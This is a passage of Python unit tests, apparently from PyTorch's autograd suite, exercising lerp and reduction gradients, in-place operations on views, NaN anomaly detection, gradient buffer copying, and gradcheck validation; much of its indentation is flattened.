        test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
def construct_inputs(*shapes):
start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
return [start, end, weight]
all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)), # no broadcasting
((3,), (3, 3, 3), (3, 3, 3)), # start broadcasting - 1
((3, 3, 3), (3,), (3, 3, 3)), # end broadcasting - 1
((3, 3, 3), (3, 3, 3), (3,)), # weight broadcasting - 1
((), (3, 3, 3), (3, 3, 3)), # start broadcasting - 2
((3, 3, 3), (), (3, 3, 3)), # end broadcasting - 2
((3, 3, 3), (3, 3, 3), ()), # weight broadcasting - 2
((3, 3), (3, 3, 3), (3,))] # all broadcasting
for shapes in all_test_shapes:
cur_inputs = construct_inputs(*shapes)
gradcheck(torch.lerp, cur_inputs)
gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
self._test_lerp_tensor_weights(lambda t: t)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
def test_reduction(op, has_no_dim, takes_dtype=True):
x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
if has_no_dim:
grad1, = torch.autograd.grad([op(x)], [x])
grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
if takes_dtype:
grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
else:
grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
self.assertEqual(grad1, grad2)
self.assertEqual(grad2.dtype, torch.float)
test_reduction(torch.sum, True)
test_reduction(torch.prod, True)
test_reduction(torch.cumsum, False)
test_reduction(torch.cumprod, False)
test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
    def test_inplace_on_view_backward(self):
        """Double backward through in-place ops on views must work and pick
        the correct (double-)backward node."""
        # Issue #10532: Make sure that this does not raise RuntimeError.
        net = nn.Sequential(
            nn.InstanceNorm2d(2),
            nn.ReLU(True)
        )
        x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
        g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
        torch.autograd.grad(g.sum(), [x])
        # the input itself must be untouched by the double backward
        self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
        # https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
        inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
        tmp1 = (inputs + 1).view_as(inputs)
        # in-place threshold on a view
        tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
        prob_interpolated = torch.sigmoid(tmp2)
        gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
                                        grad_outputs=torch.ones(prob_interpolated.size()),
                                        create_graph=True, retain_graph=True)[0]
        gradient_penalty = gradients.sum()
        gradient_penalty.backward()
        # walk the graph to the node produced for the in-place threshold
        fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
        self.assertEqual(fn.name(), "ThresholdBackwardBackward")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
    def test_anomaly_detect_nan(self):
        """detect_anomaly must raise on a NaN produced in backward, naming the
        offending output index, and warn with forward-trace info (or the lack
        of it when the forward ran outside the anomaly context)."""
        size = 10
        class MyFunc(Function):
            @staticmethod
            def forward(ctx, inp1, inp2, fail_0th):
                ctx.fail_0th = fail_0th
                return inp1.sum(0, keepdim=True)
            @staticmethod
            def backward(ctx, gO):
                gI = gO.clone().expand(size)
                gI[0] = 0
                gI[0] /= 0  # Generate a nan
                # fail_0th chooses which grad output carries the NaN
                if ctx.fail_0th:
                    return gI, None, None
                else:
                    return None, gI, None
        inp = torch.rand(size, requires_grad=True)
        out = MyFunc.apply(inp, inp, True)
        out.backward()  # Should not fail
        inp = torch.rand(size, requires_grad=True)
        out = MyFunc.apply(inp, inp, True)
        with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
            with warnings.catch_warnings(record=True) as w:
                with detect_anomaly():
                    out.backward()
            # forward ran outside detect_anomaly, so no trace is available
            self.assertIn('No forward pass information', str(w[0].message))
        inp = torch.rand(size, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
            with warnings.catch_warnings(record=True) as w:
                with detect_anomaly():
                    out = MyFunc.apply(inp, inp, False)
                    out.backward()
            # forward ran inside detect_anomaly, so the apply site is reported
            self.assertIn('MyFunc.apply', str(w[0].message))
    def test_nested_anomaly_detect_nan(self):
        """Anomaly detection in double backward: a NaN produced by a custom
        Function used inside another Function's backward must be reported with
        the nested function's name, and the warnings must point to both the
        inner and outer apply sites when the forward ran under detect_anomaly."""
        size = 10
        class MyFunc(Function):
            @staticmethod
            def forward(ctx, inp1, fail_0th):
                ctx.fail_0th = fail_0th
                ctx.save_for_backward(inp1)
                return inp1.sum(0, keepdim=True)
            @staticmethod
            def backward(ctx, gO):
                inp, = ctx.saved_tensors
                fail_0th = ctx.fail_0th
                g = gO.clone().expand(size)
                # backward itself calls another custom Function
                gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
                return gI, None
        class MyFunc2(Function):
            @staticmethod
            def forward(ctx, inp1, inp2, fail_0th):
                ctx.fail_0th = fail_0th
                return inp1 * 2.0 + inp2
            @staticmethod
            def backward(ctx, gO):
                fail_0th = ctx.fail_0th
                g1 = gO.clone()
                g2 = gO.clone()
                g1[0] = 0
                g2[0] = 0
                # generate a nan
                if fail_0th:
                    g1[0] /= 0
                else:
                    g2[0] /= 0
                return g1, g2, None
        inp = torch.rand(size, requires_grad=True)
        out = MyFunc.apply(inp, True)
        ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
        gsum = ginp.sum()
        gsum.backward()  # should not fail
        inp = torch.rand(size, requires_grad=True)
        out = MyFunc.apply(inp, True)
        ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
        gsum = ginp.sum()
        with warnings.catch_warnings(record=True) as w:
            with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
                with detect_anomaly():
                    gsum.backward()
        # forward ran outside the anomaly context: no forward trace
        self.assertIn('No forward pass information', str(w[1].message))
        inp = torch.rand(size, requires_grad=True)
        with warnings.catch_warnings(record=True) as w:
            with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
                with detect_anomaly():
                    out = MyFunc.apply(inp, False)
                    ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
                    gsum = ginp.sum()
                    gsum.backward()
        # both the nested and the enclosing apply sites are reported
        self.assertIn('MyFunc2.apply', str(w[1].message))
        self.assertIn('MyFunc.apply', str(w[2].message))
    def test_anomaly_grad_warnings(self):
        """Anomaly-mode warnings raised while an error propagates must still be
        visible: as regular warnings normally, or printed to stderr when the
        warnings filter turns them into errors."""
        # PyTorch won't throw warnings if there is an error
        # but we'd want to at least see them in stderr
        class StdErrDiverter:
            # context manager that captures everything written to sys.stderr
            def __enter__(self):
                self.stderr_orig = sys.stderr
                self.stderr_new = io.StringIO()
                sys.stderr = self.stderr_new
                return self
            def __exit__(self, *args):
                self.captured = self.stderr_new.getvalue()
                sys.stderr = self.stderr_orig
        # if the warnings don't throw, they will be handled as regular warnings
        with self.assertRaisesRegex(RuntimeError,
                                    "one of the variables needed for gradient computation has been "
                                    "modified by an inplace operation"):
            with warnings.catch_warnings(record=True) as w:
                with detect_anomaly():
                    a = torch.randn(5, requires_grad=True)
                    d1 = a + 1
                    d2 = d1 ** 2
                    d1 += 1
                    torch.autograd.grad(d2.sum(), a)
        self.assertEqual(len(w), 2)
        self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
        self.assertIn('Error detected in PowBackward0', str(w[1].message))
        # if the warning throws, it will be printed to sys.stderr
        with self.assertRaisesRegex(RuntimeError,
                                    "one of the variables needed for gradient computation has been "
                                    "modified by an inplace operation"):
            with warnings.catch_warnings(record=True) as w:
                with detect_anomaly():
                    warnings.simplefilter("error")
                    with StdErrDiverter() as s:
                        a = torch.randn(5, requires_grad=True)
                        d1 = a + 1
                        d2 = d1 ** 2
                        d1 += 1
                        torch.autograd.grad(d2.sum(), a)
        # only the enable-warning was recorded; the error-warning went to stderr
        self.assertEqual(len(w), 1)
        self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
        self.assertIn('Error detected in PowBackward0', s.captured)
    def test_anomaly_assign_parent_cleanup(self):
        """PyObjects created by anomaly mode's assign_parent must be released
        when the holding graph dies; checked via a weakref to an object stored
        in the parent node's metadata dict."""
        # Test that python objects created are properly cleaned up when assign_parent is called
        import weakref
        def get_ref():
            # we use torch.exp here but any function that will construct a new node in its
            # backward call in grad mode will work
            x = torch.randn(2, 2, requires_grad=True)
            t = x.exp()
            # ExpBackward calls mul, creating the MulBackward node when create_graph=True.
            # In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
            # MulBackward's anomaly metadata dict, creating the following reference chain:
            #
            # grad -> MulBackward -> PyObject -> ExpBackward
            #
            with detect_anomaly():
                grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
            # We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
            #
            # (PyObject) -> ExpBackward -> dict -> *Foo*
            #            t ----^        WeakRef ---^
            #
            # We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
            # We can test this by seeing whether Foo is not kept alive once t is destroyed
            class Foo(object):
                pass
            my_obj = Foo()
            meta_dict = t.grad_fn.metadata
            meta_dict[0] = my_obj
            ref = weakref.ref(my_obj)
            return t, ref
        t, ref = get_ref()
        # alive while t (and hence ExpBackward's metadata dict) is alive
        self.assertIsNotNone(ref())
        del t
        # deleting t must drop the whole chain, collecting Foo
        self.assertIsNone(ref())
    def test_nested_anomaly_printstack_cleanup(self):
        """The anomaly metadata dict PyObject must still be destroyed even when
        printstack ran during nested-anomaly error reporting; checked via a
        weakref to an object planted in the metadata dict."""
        # Test if metadata dict PyObject is properly destroyed
        import weakref
        def get_ref():
            # This is similar to the construction in test_anomaly_assign_parent_cleanup:
            #
            # MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
            #                  out ---^                  WeakRef ---^
            #
            # We want to check that Foo is still properly destroyed even when MyFunc2Backward's
            # AnomalyMetadata calls printstack, which does some python object manipulation.
            #
            # You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
            # since if PyObject is not destroyed here, wouldn't this test detect that also?
            # The answer is that custom function's PyObject (THPFunction) actually only holds
            # a weak reference to the c++ node!
            class MyFunc(Function):
                @staticmethod
                def forward(ctx, x):
                    ctx.save_for_backward(x)
                    return x
                @staticmethod
                def backward(ctx, gO):
                    x, = ctx.saved_tensors
                    return MyFunc2.apply(x)
            class MyFunc2(Function):
                @staticmethod
                def forward(ctx, x):
                    return x
                @staticmethod
                def backward(ctx, gO):
                    # NaN triggers the anomaly error path (and printstack)
                    return gO + float("NaN")
            inp = torch.rand(1, requires_grad=True)
            out = MyFunc.apply(inp)
            ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
            with warnings.catch_warnings(record=True) as w:
                with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
                    with detect_anomaly():
                        ginp.backward()
            class Foo(object):
                pass
            my_obj = Foo()
            meta_dict = out.grad_fn.metadata
            meta_dict[0] = my_obj
            ref = weakref.ref(my_obj)
            return out, ref
        t, ref = get_ref()
        self.assertIsNotNone(ref())
        del t
        # dropping the output must free the metadata dict and collect Foo
        self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
    def test_no_grad_copy(self):
        """The incoming gradient buffer may be stolen (no copy) by exactly one
        accumulating leaf when it is contiguous, and must be copied when it is
        non-contiguous; verified by comparing data pointers."""
        # create autograd function that saves grad pointer as class static
        class MyFunc(Function):
            static_grad_ptr = None
            @staticmethod
            def forward(ctx, inp1, inp2):
                return inp1 + inp2
            @staticmethod
            def backward(ctx, grad):
                MyFunc.static_grad_ptr = grad.data_ptr()
                return grad, grad
        class NonContGradFunc(Function):
            @staticmethod
            def forward(ctx, inp1):
                ctx.size = inp1.size()
                return torch.tensor([1.])
            @staticmethod
            def backward(ctx, grad):
                # expanded (stride-0) gradient: non-contiguous
                return torch.ones(1).expand(ctx.size)
        a = torch.randn(5, 6, requires_grad=True)
        b = torch.randn(5, 6, requires_grad=True)
        # non-contiguous grad should be copied
        NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
        self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
        self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
        # test case that should trigger no copy for one of a,b
        a.grad = b.grad = None
        MyFunc.apply(a, b)[1][0].backward()
        p_g = MyFunc.static_grad_ptr
        p_a = a.grad.data_ptr()
        p_b = b.grad.data_ptr()
        # check a,b uses different grad buffer
        self.assertFalse(p_a == p_b)
        # check one of them is using the computed buffer
        self.assertTrue(p_a == p_g or p_b == p_g)
    def test_no_grad_copy_sparse(self):
        """Sparse analogue of test_no_grad_copy: a contiguous sparse gradient's
        values buffer may be stolen by exactly one leaf, while a gradient with
        non-contiguous indices/values must be cloned for both; accumulation
        over repeated backward calls must keep working."""
        # create autograd function that saves grad pointer as class static
        class MyFunc(Function):
            static_grad_ptr = None
            @staticmethod
            def forward(ctx, inp1, inp2):
                return inp1 + inp2
            @staticmethod
            def backward(ctx, grad):
                MyFunc.static_grad_ptr = grad._values().data_ptr()
                return grad, grad
        class NonContGradFunc(Function):
            static_grad_ptr = None
            @staticmethod
            def forward(ctx, inp1, inp2):
                return inp1 + inp2
            @staticmethod
            def backward(ctx, grad):
                # Create a sparse tensor with non-contiguous indices and values
                # and return as grad.
                v = torch.rand(1, 3)
                i = torch.ones(1, 1, dtype=torch.long)
                nv = v.expand(8, 3)
                ni = i.expand(1, 8)
                ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
                NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
                return ngrad, ngrad
        a = torch.randn(10, 3, requires_grad=True)
        b = torch.randn(10, 3, requires_grad=True)
        input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
        offsets = torch.tensor([0, 4])
        import torch.nn.functional as F
        # test case that should trigger no copy for one of a,b
        emb_matrix = MyFunc.apply(a, b)
        loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
        loss.backward(retain_graph=True)
        p_g = MyFunc.static_grad_ptr
        p_a = a.grad._values().data_ptr()
        p_b = b.grad._values().data_ptr()
        # check a,b uses different grad buffer
        self.assertFalse(p_a == p_b)
        # check one of them is using the computed buffer
        self.assertTrue(p_a == p_g or p_b == p_g)
        # Run backwards multiple times to ensure accumulation works.
        for i in range(10):
            loss.backward(retain_graph=True)
        # non-contiguous indices and value, we should trigger a copy.
        a.grad = b.grad = None
        emb_matrix = NonContGradFunc.apply(a, b)
        loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
        loss.backward(retain_graph=True)
        p_g = NonContGradFunc.static_grad_ptr
        p_a = a.grad._values().data_ptr()
        p_b = b.grad._values().data_ptr()
        # check a,b uses different grad buffer
        self.assertFalse(p_a == p_b)
        # Verify we cloned both grads.
        self.assertFalse(p_a == p_g)
        self.assertFalse(p_b == p_g)
        # Run backwards multiple times to ensure accumulation works.
        for i in range(10):
            loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
    def test_gradcheck_nondeterministic(self):
        """gradcheck must flag a non-reentrant backward ('Backward is not
        reentrant') when the jitter exceeds the default tolerance, and accept
        it again once nondet_tol is raised."""
        class NonDetFunc(Function):
            @staticmethod
            def forward(ctx, x, jitter=0.0):
                ctx._jitter = jitter
                return x
            @staticmethod
            def backward(ctx, grad_out):
                # gradient perturbed by a random factor scaled by jitter
                return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
        def check(fast_mode):
            inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
            # zero jitter: deterministic, passes
            gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
            with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
                gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
            with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
                gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
            # with nondet_tol=1e-5 the same jitters are tolerated
            gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
                      fast_mode=fast_mode)
            gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
                      fast_mode=fast_mode)
            gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
                          fast_mode=fast_mode)
        check(fast_mode=True)
        check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
    """Input validation in gradcheck: sparse inputs without check_sparse_nnz,
    inputs that don't require grad, non-double inputs, and zero-stride dims."""
    def check(fast_mode):
        # when inputs are not dense, but check_sparse_nnz is false
        x = torch.rand(10, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
            gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
                      fast_mode=fast_mode)
        self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
                                   check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))

        # when none of the inputs require grad (always raises even if raise_exception=False)
        x = torch.rand(10, requires_grad=False)
        with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
            gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)

        # (warning) when inputs are not double precision
        x = torch.ones(1, dtype=torch.float32, requires_grad=True)
        with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
            # Loose atol because the check runs in single precision here.
            self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))

        # when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
        # even if raise_exception=False)
        x = torch.ones(1, dtype=torch.float64, requires_grad=True)
        x = x.expand((2, 2))  # expand() creates the stride-0 dimensions
        with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
            gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
    check(fast_mode=True)
    check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
    """MKL-DNN inputs must be rejected when forward-mode AD checking is requested,
    in both fast and slow mode."""
    # when mkldnn inputs, forward mode testing is not allowed
    # Update tolerances below to make sure the gradient match even in single precision floats
    # Use the warning assert to hide the float32 warning
    x = torch.ones(1).to_mkldnn().requires_grad_()
    with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
        with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
            gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
                      atol=1e-1, rtol=1e-1)

    with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
        with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
            gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
                      atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
    """Sparse and MKL-DNN *outputs* are unsupported by gradcheck and always
    raise, even with raise_exception=False."""
    def check(fast_mode):
        # when sparse outputs (always raise even if raise_exception=False)
        x = torch.rand(10, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
            gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
                      fast_mode=fast_mode)

        # when mkldnn outputs (always raise even if raise_exception=False)
        root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
        with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
            gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
    """When no output is differentiable, gradcheck requires the numerical
    gradient to be zero; a function with no outputs at all passes trivially."""
    def check(fast_mode):
        # When none of the outputs are differentiable, but numerical gradient is not zero
        # (torch.tensor([x]) breaks the graph, yet perturbing x changes the output value)
        x = torch.ones((1,), requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
            gradcheck(lambda x: torch.tensor([x]), x)
        self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))

        # succeed when no outputs at all
        self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
    """Batched-grad checking on a sparse input fails with the dedicated
    'failed while testing batched gradient' error."""
    def check(fast_mode):
        x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
        # runtime error while compute batched grad (print big error)
        with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
            gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
        self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
                                   raise_exception=False, fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
    """gradcheck's sanity checks on grad_input: wrong sparse dims, backward
    not scaling with grad_output (dense and sparse), and wrong grad layout.
    Hooks are used to corrupt the gradient in each specific way."""
    # when grad_input is sparse and has incorrect sparse_dim/dense_dim
    def check(fast_mode):
        def fn(x):
            def hook(grad):
                if grad is not None:
                    # Corrupt the grad's sparse_dim/dense_dim split.
                    return grad.to_dense().to_sparse(1)
                return grad
            y = x.clone()
            y.register_hook(hook)
            return y.to_dense()
        x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
            gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
                                   raise_exception=False, fast_mode=fast_mode))

        # when backward not multiplied by grad_output (non-sparse case)
        def fn2(x):
            y = x.clone()
            # Adding a constant makes grad no longer proportional to grad_output.
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
            gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))

        # when backward not multiplied by grad_output (sparse case)
        def fn3(x):
            y = x.clone().to_dense()
            y.register_hook(lambda x: x + 1e-2)
            return y
        x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
        with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
            gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
        self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
                                   raise_exception=False, fast_mode=fast_mode))

        # when layout of grad_input is not the same as input
        class Test(Function):
            @staticmethod
            def forward(ctx, x):
                return x

            @staticmethod
            def backward(ctx, x):
                # Returns a sparse grad for a dense input.
                return x.to_sparse()
        x = torch.ones(1, dtype=torch.double, requires_grad=True)
        with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
            gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
        self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
    check(fast_mode=True)
    check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
    """gradcheck's undefined-grad probe: a backward that errors on an
    undefined (None) output grad must be reported."""
    def check(fast_mode):
        # when encounter runtime error while running backward
        def fn(x):
            def hook(x):
                if x is None:
                    raise RuntimeError("x is undefined")
            y = x.clone()
